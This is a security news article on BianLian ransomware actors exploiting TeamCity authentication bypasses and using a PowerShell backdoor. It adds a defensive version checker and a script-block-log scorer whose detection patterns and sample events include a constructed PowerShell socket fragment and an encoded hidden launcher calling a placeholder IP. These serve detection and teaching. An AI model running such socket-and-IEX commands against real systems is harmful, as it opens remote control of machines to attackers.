BianLian Threat Actors Exploit JetBrains TeamCity Vulnerabilities in Ransomware Attacks
March 11, 2024
BianLian ransomware actors have been observed exploiting security vulnerabilities in JetBrains TeamCity software to carry out their extortion attacks. A new report from GuidePoint Security, written up after a recent intrusion response, found that the incident began with the exploitation of a TeamCity server and led to the deployment of a PowerShell implementation of BianLian's Go backdoor.
BianLian first appeared in June 2022 and, following the release of a decryptor in January 2023, has focused exclusively on exfiltration-based extortion rather than encryption. GuidePoint Security observed an attack chain that starts with the exploitation of a vulnerable TeamCity instance using either CVE-2024-27198 or CVE-2023-42793 to gain initial access; both are authentication bypasses in TeamCity On-Premises that give an unauthenticated attacker administrative control of the server. This is followed by the creation of new users on the build server and the execution of malicious commands for post-exploitation and lateral movement. It remains unclear which of the two vulnerabilities the threat actor used to get in.
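Both CVEs named above have published fixed versions in JetBrains' advisories: TeamCity 2023.05.4 closed CVE-2023-42793 (September 2023) and 2023.11.4 closed CVE-2024-27198 (March 2024). As an added example, not code from GuidePoint's report or from JetBrains, the following Python maps a TeamCity version string, taken from wherever you read it (the web UI footer, an asset inventory, a REST response), onto the CVEs that version still lacks fixes for. The host names and version strings in the inventory are constructed.

```python
import re

# Fixed-in versions taken from JetBrains' advisories for TeamCity On-Premises:
# 2023.05.4 closed CVE-2023-42793 (September 2023) and 2023.11.4 closed
# CVE-2024-27198 (March 2024). Anything older is exposed to the listed CVE.
FIXED_IN = {
    "CVE-2023-42793": (2023, 5, 4),
    "CVE-2024-27198": (2023, 11, 4),
}

# TeamCity versions look like "2023.05.3" (often followed by "(build N)"); the build
# number is ignored and a missing patch component such as "2023.11" is treated as .0.
_VERSION_RE = re.compile(r"\b(\d{4})\.(\d{2})(?:\.(\d+))?\b")


def parse_version(text):
    """Extract a TeamCity version tuple from a string such as a UI footer or banner."""
    match = _VERSION_RE.search(text)
    if match is None:
        raise ValueError(f"no TeamCity version found in {text!r}")
    year, month, patch = match.groups()
    return (int(year), int(month), int(patch or 0))


def affected_cves(version_text):
    """Return the CVEs from FIXED_IN whose fix the given version does not yet include."""
    version = parse_version(version_text)
    return sorted(cve for cve, fixed in FIXED_IN.items() if version < fixed)


def exposure_report(hosts):
    """Map each (hostname, version string) pair to its list of unpatched CVEs."""
    return {host: affected_cves(version) for host, version in hosts}


if __name__ == "__main__":
    # Constructed inventory, not hosts from the incident described above.
    inventory = [
        ("ci-legacy.example.internal", "TeamCity 2023.05.3"),
        ("ci-main.example.internal", "TeamCity 2023.11.3"),
        ("ci-new.example.internal", "TeamCity 2023.11.4"),
    ]
    for host, cves in exposure_report(inventory).items():
        print(f"{host}: {', '.join(cves) if cves else 'no known exposure'}")
```

A passing version check only says the server is not exploitable today. A server that sat unpatched while either CVE was being exploited in the wild may already have been compromised, so the user list and audit log of any instance that was ever behind should be reviewed for the unexpected accounts the report describes, regardless of its current version.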
Known for a custom backdoor written in Go and tailored to each victim, the BianLian actors also drop remote desktop tools such as AnyDesk, Atera, SplashTop, and TeamViewer. Microsoft tracks the backdoor as BianDoor. Security researchers Justin Timothy, Gabe Renfro, and Keven Murphy stated, 'After multiple failed attempts to execute their standard Go backdoor, the threat actor pivoted to living-off-the-land and leveraged a PowerShell implementation of their backdoor, which provides an almost identical functionality to what they would have with their Go backdoor.'
The obfuscated PowerShell backdoor, a script named 'web.ps1', opens a TCP socket to an actor-controlled server and lets the remote operator carry out arbitrary actions on the infected host. The researchers added, 'The now-confirmed backdoor is able to communicate with the [command-and-control] server and asynchronously execute based on the remote attacker's post-exploitation objectives.'
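Because this backdoor is a PowerShell script rather than a dropped binary, the most useful host telemetry is PowerShell script block logging (Event ID 4104), which records the script text after PowerShell has de-obfuscated it. The following Python is an added example and is neither GuidePoint's detection logic nor BianLian's web.ps1: it scores script block text for the traits the report attributes to the backdoor (TCP socket creation, dynamic execution, asynchronous execution) plus common launch wrappers (-EncodedCommand, hidden window), and decodes embedded base64 literals so that a payload hidden behind -enc is rescanned. The indicator patterns, their weights, the threshold and the sample events are this example's own construction.

```python
import base64
import re
import string

# Weighted indicators for a PowerShell socket backdoor of the kind described above.
# Patterns and weights are this example's own choices, not a published signature,
# and the sample events below are constructed, not logs from the incident.
INDICATORS = {
    "tcp_socket":         (r"Net\.Sockets\.TcpClient|\.GetStream\(\)", 3),
    "dynamic_exec":       (r"\bI`?E`?X\b|Invoke-Expression|\[ScriptBlock\]::Create\(", 2),
    "async_exec":         (r"\.BeginInvoke\(|\bStart-Job\b|\[PowerShell\]::Create\(|RunspaceFactory", 2),
    "encoded_payload":    (r"FromBase64String|-[Ee](?:nc(?:odedCommand)?)?\b", 2),
    "hidden_window":      (r"-W(?:indowStyle)?\s+Hidden|-NoP(?:rofile)?\b", 1),
    "string_obfuscation": (r"(?:\[char\]\s*\d+\s*\+\s*){2,}|(?:`[A-Za-z]){3,}|-join\b", 1),
}
_COMPILED = {name: (re.compile(pat, re.IGNORECASE), weight)
             for name, (pat, weight) in INDICATORS.items()}

# Base64 literals passed to FromBase64String or to -EncodedCommand / -enc / -e.
_B64_ARG = re.compile(
    r"(?:FromBase64String\(\s*['\"]|-[Ee](?:nc(?:odedCommand)?)?\s+)([A-Za-z0-9+/]{16,}={0,2})",
    re.IGNORECASE,
)


def _decode_layer(b64_text):
    """Decode a base64 literal as UTF-16LE (what -EncodedCommand uses) or UTF-8; None if not text."""
    try:
        raw = base64.b64decode(b64_text)
    except ValueError:
        return None
    for encoding in ("utf-16le", "utf-8"):
        try:
            text = raw.decode(encoding)
        except UnicodeDecodeError:
            continue
        if text and sum(ch in string.printable for ch in text) / len(text) > 0.9:
            return text
    return None


def triage(script_text, max_depth=3):
    """Score one script block, rescanning up to max_depth decoded base64 layers."""
    hits = set()
    layers = [script_text]
    for text in layers:  # appending inside the loop extends the iteration
        for name, (pattern, _) in _COMPILED.items():
            if pattern.search(text):
                hits.add(name)
        for match in _B64_ARG.finditer(text):
            decoded = _decode_layer(match.group(1))
            if decoded and len(layers) <= max_depth:
                layers.append(decoded)
    score = sum(_COMPILED[name][1] for name in hits)
    return {"score": score, "hits": sorted(hits), "layers": len(layers)}


def scan_events(events, threshold=5):
    """Return (event_id, score, hits) for every script block scoring at or above threshold."""
    flagged = []
    for event_id, text in events:
        result = triage(text)
        if result["score"] >= threshold:
            flagged.append((event_id, result["score"], result["hits"]))
    return flagged


# Constructed events in the shape of PowerShell script block logging (Event ID 4104
# ScriptBlockText). The socket fragment is a textbook pattern, not BianLian's web.ps1.
_SOCKET_FRAGMENT = ("$c = New-Object Net.Sockets.TcpClient('198.51.100.10', 443); "
                    "$s = $c.GetStream(); IEX $cmd")
SAMPLE_EVENTS = [
    ("4104-0001", "Get-ChildItem C:\\Users -Recurse | Where-Object { $_.Length -gt 1MB }"),
    ("4104-0002", "Get-Service | Where-Object Status -eq 'Running' | Export-Csv services.csv"),
    ("4104-0003", "$job = Start-Job -ScriptBlock { " + _SOCKET_FRAGMENT + " }"),
    ("4104-0004", "powershell.exe -NoP -W Hidden -enc "
                  + base64.b64encode(_SOCKET_FRAGMENT.encode("utf-16le")).decode("ascii")),
]

if __name__ == "__main__":
    for event_id, score, hits in scan_events(SAMPLE_EVENTS):
        print(f"{event_id}: score={score} indicators={', '.join(hits)}")
```

The two administrative one-liners score zero, the Start-Job wrapper around a socket scores on three indicators, and the -enc launcher only reaches the threshold because its payload is decoded and rescanned; without that step an encoded backdoor would look like any other encoded command. Script block logging must be enabled for this telemetry to exist at all, and a scoring scheme like this is a triage aid, not a verdict, so the weights should be tuned against your own baseline of legitimate automation.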
The disclosure comes as new proof-of-concept (PoC) exploits have been detailed for CVE-2023-22527, a critical template injection flaw in Atlassian Confluence Data Center and Confluence Server that yields remote code execution. The new exploits are fileless, loading the Godzilla web shell directly into memory. Over the past two months the flaw has been weaponized to deploy C3RB3R ransomware, cryptocurrency miners, and remote access trojans, indicating broad exploitation in the wild.